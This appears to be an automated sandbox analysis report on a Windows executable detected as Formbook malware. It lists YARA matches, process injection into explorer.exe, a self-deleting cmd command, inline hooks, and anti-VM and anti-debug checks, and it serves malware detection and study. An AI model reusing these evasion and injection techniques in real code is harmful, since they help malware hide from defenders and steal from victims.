          Source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.zHgm9k7WYU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.zHgm9k7WYU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.zHgm9k7WYU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.zHgm9k7WYU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: zHgm9k7WYU.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@6/5
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\zHgm9k7WYU.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5024:120:WilError_01
          Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: zHgm9k7WYU.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\zHgm9k7WYU.exe 'C:\Users\user\Desktop\zHgm9k7WYU.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\zHgm9k7WYU.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\zHgm9k7WYU.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess created: C:\Users\user\Desktop\zHgm9k7WYU.exe {path}
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\zHgm9k7WYU.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: zHgm9k7WYU.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: zHgm9k7WYU.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: zHgm9k7WYU.exeStatic file information: File size 1081344 > 1048576
          Source: zHgm9k7WYU.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x107400
          Source: zHgm9k7WYU.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: explorer.pdbUGP source: zHgm9k7WYU.exe, 00000001.00000002.297137700.0000000003620000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000002.582881514.0000000007100000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: zHgm9k7WYU.exe, 00000001.00000002.294215275.0000000001B2F000.00000040.00000001.sdmp, explorer.exe, 00000007.00000002.574401869.000000000567F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: zHgm9k7WYU.exe, 00000001.00000002.294215275.0000000001B2F000.00000040.00000001.sdmp, explorer.exe
          Source: Binary string: explorer.pdb source: zHgm9k7WYU.exe, 00000001.00000002.297137700.0000000003620000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000002.582881514.0000000007100000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeUnpacked PE file: 0.2.zHgm9k7WYU.exe.5b0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
          Detected unpacking (overwrites its own PE header)Show sources
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeUnpacked PE file: 0.2.zHgm9k7WYU.exe.5b0000.0.unpack
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_005B5DF5 push esp; iretd
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_005B39AE push edi; retf
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057EC208 push eax; iretd
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057EA8EF push E802E15Eh; retf
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00405906 push esp; iretd
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00416BA6 pushfd ; iretd
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00417694 push esi; iretd
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041CEB5 push eax; ret
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041CF6C push eax; ret
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041CF02 push eax; ret
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041CF0B push eax; ret
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00ED39AE push edi; retf
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00ED5DF5 push esp; iretd
          Source: C:\Windows\explorer.exeCode function: 2_2_074BF3E6 pushad ; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055DD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010A5906 push esp; iretd
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010B6BA6 pushfd ; iretd
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BCF0B push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BCF02 push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BCF6C push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010B7694 push esi; iretd
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BCEB5 push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.44897781491

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xBE 0xE4
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000000.00000002.254778297.0000000002D31000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: zHgm9k7WYU.exe PID: 1928, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 00000000010A98E4 second address: 00000000010A98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 00000000010A9B5E second address: 00000000010A9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe TID: 2260Thread sleep time: -31500s >= -30000s
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe TID: 4132Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5256Thread sleep count: 45 > 30
          Source: C:\Windows\explorer.exe TID: 5256Thread sleep time: -90000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 4396Thread sleep time: -90000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: explorer.exe, 00000002.00000000.273817889.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.257951536.00000000011EE000.00000004.00000020.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.272926812.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.273817889.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmpBinary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000002.00000002.569426220.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000002.00000002.569770754.00000000011EE000.00000004.00000020.sdmpBinary or memory string: @%SystemRoot%\System32\mswsock.dll,-60102-9%SystemRoot%\system32\mswsock.dlle6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&
          Source: explorer.exe, 00000002.00000000.273897961.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000002.00000002.580860292.00000000053D7000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000002.00000000.272926812.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.272926812.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.273897961.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmpBinary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000002.00000000.272926812.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0040ACD0 LdrLoadDll,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055A7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055C3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05603540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05633D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055AC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05658D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0560A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0564E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0558AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05593D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05593D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05593D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05593D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05593D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05593D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05593D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05593D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05593D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05593D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05593D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05593D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05593D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0564FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0564FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0564FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0564FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05638DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05606DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05606DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05606DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05606DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05606DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05606DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0559D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0559D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055BFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_056505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05582D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05582D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05582D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05582D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_05582D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055B2581 mov eax, dword ptr fs:[00000030h]
